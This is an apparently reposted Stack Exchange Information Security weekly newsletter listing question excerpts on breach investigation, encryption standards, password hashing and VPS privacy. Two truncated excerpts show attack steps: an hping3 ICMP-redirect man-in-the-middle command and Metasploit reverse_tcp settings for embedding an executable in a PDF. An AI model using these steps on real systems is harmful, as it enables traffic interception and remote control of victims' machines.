Skip to main content

Information Security Weekly Newsletter - Wednesday, October 28, 2015

Information Security Weekly Newsletter

Top new questions this week:

How do companies check *what* has been hacked?

In the UK, the company TalkTalk was recently hacked. It was later discovered, after 'investigation' that the hack was not as serious as it could have been (and less than expected). I'm wondering: ...

incident-response  
asked by ᔕᖺᘎᕊ 58 votes
answered by gowenfawr 79 votes

Why has the NSA had a hand in deciding on encryption standards?

The NSA has had a large hand in the design of at least two significant encryption standards: the Digital Encryption Standard, and its successor, the Advanced Encryption Standard. Because of their ...

encryption aes nsa des history  
asked by IQAndreas 57 votes
answered by Thomas Pornin 92 votes

Why do email programs block xml files?

A colleague sent a .xml file to me earlier today, which was blocked by Outlook. As we were discussing the workaround (put it in a .zip), we got to wondering why .xml files are blocked. My colleague ...

email xml  
asked by KidneyChris 54 votes
answered by Mike Goodwin 67 votes

Is using bcrypt on existing SHA1 hashes good enough when switching password implementation?

I'm working on improving a CMS where the current implementation of storing password is just sha1(password). I explained to my boss that doing it that way is incredibly insecure, and told him that we ...

passwords password-management sha bcrypt  
asked by Alex 34 votes
answered by martinstoeckli 51 votes

Could a VPS provider have access to the content of their users?

Could a VPS provider like DigitalOcean have access to the content of their users? In their terms of service they do not mention anything related to this question, but could they theoretically have ...

server  
asked by hipocd 20 votes
answered by Philipp 42 votes

Is there any reason to block HTTPS?

Within our local education's I.T system, all websites served via HTTPS are blocked, except a select few websites which are 'authorized'. This results in some websites being unable to function ...

tls http censor  
asked by bob 14 votes
answered by WisTex 17 votes

Is it possible for a vulnerability in one application to be exploited to attack another application on the same server?

If for example I have Magento-eCommerce and WordPress installed on the same server. Both have a database each with a different database username/password and both have different login details to the ...

attacks vulnerabilities  
asked by user3438958 10 votes
answered by RL.AdmiralX 22 votes

Greatest hits from previous weeks:

Google Chrome "Your connection to website is encrypted with obsolete cryptography"

Google Chrome is showing new information in the certificate section. Is this a big deal? If so how can I fix it on the server end? EDIT: Thanks for the answers but I'm not skilled in cryptography ...

cryptography chrome  
asked by IMcPwn 30 votes
answered by Adm Selec 19 votes

How do I use "openssl s_client" to test for (absence of) SSLv3 support?

In order to mitigate the "Poodle" vulnerability, I'd like to disable SSLv3 support in my (in this case, TLS, rather than HTTPS) server. How can I use openssl s_client to verify that I've done this?

tls openssl  
asked by Roger Lipscombe 44 votes
answered by P4cK3tHuNt3R 54 votes

Can you answer these?

Can ICMP Redirects still be used to redirect traffic in a LAN?

I tried just tried to migrate a MITM attack using hping3 with ICMP Redirects in my testlab. hping3 -I eth0 -C 5 -K 1 -a 192.168.2.1 --icmp-ipdst 192.168.2.15 --icmp-gw 192.168.2.100 --icmp-ipsrc ...

network man-in-the-middle packet icmp  
asked by davidb 2 votes

Why does the tool 'codesign' in OS X 10.11 (El Capitan) report every Python process as "code object is not signed at all"?

If you start any Python process on OS X 10.11 (10.11.0 or 10.11.1) El Capitan, and run the OS built-in tool 'codesign' to verify the process, you will receive an error saying "code object is not ...

macosx python code-signing  
asked by Lei L 2 votes

The pdf embedded exe generating error on the target machine when executed

These are the steps that I performed in order to generate a PDF embedded with exe. Attacker machine (Windows 7): msf > use windows/meterpreter/reverse_tcp msf payload(reverse_tcp) > set LHOST ...

metasploit  
asked by user3037348 1 vote
Subscribe to more Stack Exchange newsletters


Unsubscribe from this newsletter or change your email preferences by visiting your subscriptions page on stackexchange.com.

Questions? Comments? Let us know on our feedback site. If you no longer want to receive mail from Stack Exchange, unsubscribe from all stackexchange.com emails.

Stack Exchange, Inc. 110 William St, 28th Floor, NY NY 10038 <3

Comments

Popular posts from this blog

Drupal Answers Weekly Newsletter - Wednesday, December 31, 2014

Top new questions this week: Can I delete old hook_update_N functions? Suppose you have a custom module, and you have hook_update_N() implementations in your .install file. If you have old update functions, and all updates have run in all sites that the module is ... node-update hook-update-n   asked by AyeshK ...

[New post] 8th Class Result 2014 PEC Hafizabad Board

Muhammad Waqas posted: "PEC Hafizabad Board 8th Class Result 2014 expected date is 28th March, 2014 by PEC. Punjab Examination Commission (PEC) will announce 8th class result for Hafizabad Board soon and all the students of Hafizabad Board who are extremely waiting for the resul" New post on Jobs in Pakistan 8th Class Result 2014 PEC Hafizabad Board by Muhammad Waqas ...

[New post] 1st Year (11th Class) Result 2014 BISE Rawalpindi Board

Xaib Aslam posted: "BISERWP board Inter part 1 result expected on 10th October 2014 according our source. students of Rawalpindi board desperately waiting for 11th class result. 1st they upload the 12th class result and after some time they ready for showing the 1st year fin" New post on Jobs in Pakistan 1st Year (11th Class) Result 2014 BISE Rawalpindi Board by Xaib Aslam ...